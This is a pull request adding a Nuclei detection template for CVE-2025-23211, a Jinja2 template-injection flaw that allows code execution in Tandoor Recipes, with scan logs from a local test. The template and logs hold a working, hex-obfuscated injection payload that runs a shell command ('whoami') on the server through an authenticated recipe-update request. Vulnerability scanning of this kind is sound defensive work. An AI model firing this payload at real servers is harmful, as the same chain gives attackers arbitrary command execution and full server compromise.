### PR TITLE
Add `CVE-2025-23211` Template

### DIFF
--- a/http/cves/2025/CVE-2025-23211.yaml
+++ b/http/cves/2025/CVE-2025-23211.yaml
@@ -1,0 +1,109 @@
+id: CVE-2025-23211
+
+info:
+  name: Tandoor Recipes < 1.5.24 - Jinja2 SSTI RCE
+  author: sammiee5311 
+  severity: critical
+  description: |
+    Tandoor Recipes < 1.5.24 has a Jinja2 SSTI vulnerability that allows command execution via recipe steps.
+  impact: |
+    Attackers can execute arbitrary code on the server by injecting malicious Jinja2 template expressions in recipe steps. This may lead to full server compromise, data disclosure, and privilege escalation.
+  remediation: |
+    Upgrade to Tandoor Recipes version 1.5.24.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-23211
+    - https://github.com/TandoorRecipes/recipes/blob/4f9bff20c858180d0f7376de443a9fe4c123a50c/cookbook/helper/template_helper.py#L95
+    - https://github.com/TandoorRecipes/recipes/commit/e6087d5129cc9d0c24278948872377e66c2a2c20
+    - https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-r6rj-h75w-vj8v
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2025-23211
+    cwe-id: CWE-94, CWE-1336
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"Tandoor Recipes"
+  tags: cve,cve2025,rce,ssti,tandoor,jinja2
+
+variables:
+  recipe_id: "2"
+  token: JB81ig7b9iDQ79vlBa9sHmK1L9nvqMHr
+  sessionid: abhg2gpc5uhl6y0l3w9x3dhmaqwvcf16
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        PUT /api/recipe/{{recipe_id}}/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Cookie: csrftoken={{token}}; sessionid={{sessionid}}
+        X-CSRFToken: {{token}}
+        Accept: */*
+
+        {
+          "id": {{recipe_id}},
+          "name": "test",
+          "description": "test",
+          "image": null,
+          "keywords": [],
+          "steps": [
+            {
+              "id": {{recipe_id}},
+              "name": "",
+              "instruction": "()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')",              
+              "ingredients": [],
+              "instructions_markdown": "",
+              "time": 0,
+              "order": 0,
+              "show_as_header": false,
+              "file": null,
+              "step_recipe": null,
+              "step_recipe_data": null,
+              "show_ingredients_table": true,
+              "time_visible": false,
+              "ingredients_visible": true,
+              "instruction_visible": true,
+              "step_recipe_visible": false,
+              "file_visible": false
+            }
+          ],
+          "working_time": 0,
+          "waiting_time": 0,
+          "created_by": 1,
+          "created_at": "2025-07-27T03:53:14.909900+02:00",
+          "updated_at": "2025-07-27T03:53:14.953264+02:00",
+          "source_url": null,
+          "internal": true,
+          "show_ingredient_overview": true,
+          "nutrition": null,
+          "properties": [],
+          "food_properties": {},
+          "servings": 1,
+          "file_path": "",
+          "servings_text": "",
+          "rating": null,
+          "last_cooked": null,
+          "private": false,
+          "shared": [],
+          "food_name": "12345"
+        }
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - raw:
+      - |
+        GET /api/recipe/{{recipe_id}}/ HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: csrftoken={{token}}; sessionid={{sessionid}}
+        X-CSRFToken: {{token}}
+
+    matchers:
+      - type: word
+        words:
+          - "root"


### PR DESCRIPTION
Hello,

I'm submitting this PR to contribute a template for `CVE-2025-23211`, which affects Tandoor Recipes due to unsafe Jinja2 template rendering.

Thanks a lot!

### Template / PR Information
- Added CVE-2025-23211 detection template for Tandoor Recipes (<1.5.24)
- This vulnerability is due to a Jinja2 Server-Side Template Injection (SSTI) in the Tandoor Recipes application, which allows users to execute arbitrary commands on the server.
- The template uses a controlled payload to detect SSTI behavior by injecting a Jinja2 expression and observing command execution output (e.g., `whoami`, `env`).

Reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-23211
- [cookbook/helper/template_helper.py#L95](https://github.com/TandoorRecipes/recipes/blob/4f9bff20c858180d0f7376de443a9fe4c123a50c/cookbook/helper/template_helper.py#L95)
- https://github.com/TandoorRecipes/recipes/commit/e6087d5129cc9d0c24278948872377e66c2a2c20
- https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-r6rj-h75w-vj8v


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details (leave it blank if not applicable)

Verified using local Docker deployment of Tandoor Recipes <1.5.24.

### Scan command:
```sh
nuclei -t http/cves/2025/CVE-2025-23211.yaml -v -debug -u http://localhost:80
```

### Logs
```sh
nuclei-templates % nuclei -t http/cves/2025/CVE-2025-23211.yaml -v -debug -u http://localhost:80

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-23211] Dumped HTTP request for http://localhost:80/api/recipe/2/

PUT /api/recipe/2/ HTTP/1.1
Host: localhost
User-Agent: <redacted>
Connection: close
Content-Length: 1381
Accept: */*
Content-Type: application/json
Cookie: csrftoken=JB81ig7b9iDQ79vlBa9sHmK1L9nvqMHr; sessionid=abhg2gpc5uhl6y0l3w9x3dhmaqwvcf16
X-CSRFToken: JB81ig7b9iDQ79vlBa9sHmK1L9nvqMHr
Accept-Encoding: gzip

{
  "id": 2,
  "name": "test",
  "description": "test",
  "image": null,
  "keywords": [],
  "steps": [
    {
      "id": 2,
      "name": "",
      "instruction": "()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')",              
      "ingredients": [],
      "instructions_markdown": "",
      "time": 0,
      "order": 0,
      "show_as_header": false,
      "file": null,
      "step_recipe": null,
      "step_recipe_data": null,
      "show_ingredients_table": true,
      "time_visible": false,
      "ingredients_visible": true,
      "instruction_visible": true,
      "step_recipe_visible": false,
      "file_visible": false
    }
  ],
  "working_time": 0,
  "waiting_time": 0,
  "created_by": 1,
  "created_at": "2025-07-27T03:53:14.909900+02:00",
  "updated_at": "2025-07-27T03:53:14.953264+02:00",
  "source_url": null,
  "internal": true,
  "show_ingredient_overview": true,
  "nutrition": null,
  "properties": [],
  "food_properties": {},
  "servings": 1,
  "file_path": "",
  "servings_text": "",
  "rating": null,
  "last_cooked": null,
  "private": false,
  "shared": [],
  "food_name": "12345"
}
[VER] [CVE-2025-23211] Sent HTTP request to http://localhost:80/api/recipe/2/
[DBG] [CVE-2025-23211] Dumped HTTP response http://localhost:80/api/recipe/2/

HTTP/1.1 200 OK
Connection: close
Content-Length: 1201
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Language: en
Content-Type: application/json
Cross-Origin-Opener-Policy: same-origin
Date: Sun, 27 Jul 2025 06:11:56 GMT
Referrer-Policy: same-origin
Server: nginx/1.29.0
Vary: Accept, Accept-Language, Cookie
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"id":2,"name":"test","description":"test","image":null,"keywords":[],"steps":[{"id":2,"name":"","instruction":"()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')","ingredients":[],"instructions_markdown":"<p>()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')</p>","time":0,"order":0,"show_as_header":false,"file":null,"step_recipe":null,"step_recipe_data":null,"show_ingredients_table":true}],"working_time":0,"waiting_time":0,"created_by":1,"created_at":"2025-07-27T03:53:14.909900+02:00","updated_at":"2025-07-27T08:11:56.265924+02:00","source_url":null,"internal":true,"show_ingredient_overview":true,"nutrition":null,"properties":[],"food_properties":{},"servings":1,"file_path":"","servings_text":"","rating":null,"last_cooked":null,"private":false,"shared":[]}
[CVE-2025-23211:status-1] [http] [critical] http://localhost:80/api/recipe/2/
[INF] [CVE-2025-23211] Dumped HTTP request for http://localhost:80/api/recipe/2/

GET /api/recipe/2/ HTTP/1.1
Host: localhost
User-Agent: <redacted>
Connection: close
Cookie: csrftoken=JB81ig7b9iDQ79vlBa9sHmK1L9nvqMHr; sessionid=abhg2gpc5uhl6y0l3w9x3dhmaqwvcf16
X-CSRFToken: JB81ig7b9iDQ79vlBa9sHmK1L9nvqMHr
Accept-Encoding: gzip

[VER] [CVE-2025-23211] Sent HTTP request to http://localhost:80/api/recipe/2/
[DBG] [CVE-2025-23211] Dumped HTTP response http://localhost:80/api/recipe/2/

HTTP/1.1 200 OK
Connection: close
Content-Length: 1201
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Language: en
Content-Type: application/json
Cross-Origin-Opener-Policy: same-origin
Date: Sun, 27 Jul 2025 06:11:56 GMT
Referrer-Policy: same-origin
Server: nginx/1.29.0
Vary: Accept, Accept-Language, Cookie
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

{"id":2,"name":"test","description":"test","image":null,"keywords":[],"steps":[{"id":2,"name":"","instruction":"()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')","ingredients":[],"instructions_markdown":"<p>()|attr('\\x5f\\x5fclass\\x5f\\x5f')|attr('\\x5f\\x5fbase\\x5f\\x5f')|attr('\\x5f\\x5fsubclasses\\x5f\\x5f')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(418)('whoami',shell=True,stdout=-1)|attr('communicate')()|attr('\\x5f\\x5fgetitem\\x5f\\x5f')(0)|attr('decode')('utf-8')</p>","time":0,"order":0,"show_as_header":false,"file":null,"step_recipe":null,"step_recipe_data":null,"show_ingredients_table":true}],"working_time":0,"waiting_time":0,"created_by":1,"created_at":"2025-07-27T03:53:14.909900+02:00","updated_at":"2025-07-27T08:11:56.265924+02:00","source_url":null,"internal":true,"show_ingredient_overview":true,"nutrition":null,"properties":[],"food_properties":{},"servings":1,"file_path":"","servings_text":"","rating":null,"last_cooked":null,"private":false,"shared":[]}
[INF] Scan completed in 927.05017ms. 1 matches found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)